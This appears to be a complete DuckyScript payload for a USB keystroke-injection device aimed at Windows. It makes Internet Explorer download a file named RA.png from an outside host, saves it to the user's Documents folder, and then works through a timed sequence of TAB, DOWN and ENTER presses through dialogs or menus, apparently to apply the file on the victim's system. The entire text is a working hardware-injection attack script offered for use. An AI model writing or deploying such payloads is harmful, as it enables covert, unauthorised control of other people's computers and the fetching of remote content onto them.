DELAY 5000
CONTROL ESCAPE
DELAY 100
STRING iexplore https://transfer.kauper.de/file/image/RA.png
ENTER
DELAY 4000
CONTROL s
DELAY 2000
ENTER
DELAY 300
CONTROL ESCAPE
DELAY 300
STRING %USERPROFILE%\Documents\RA.png
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
DOWN
DELAY 500
DOWN
DELAY 500
DOWN
DELAY 500
DOWN
DELAY 500
ENTER
DELAY 500
DOWN
DELAY 500
DOWN
DELAY 500
ENTER
DELAY 500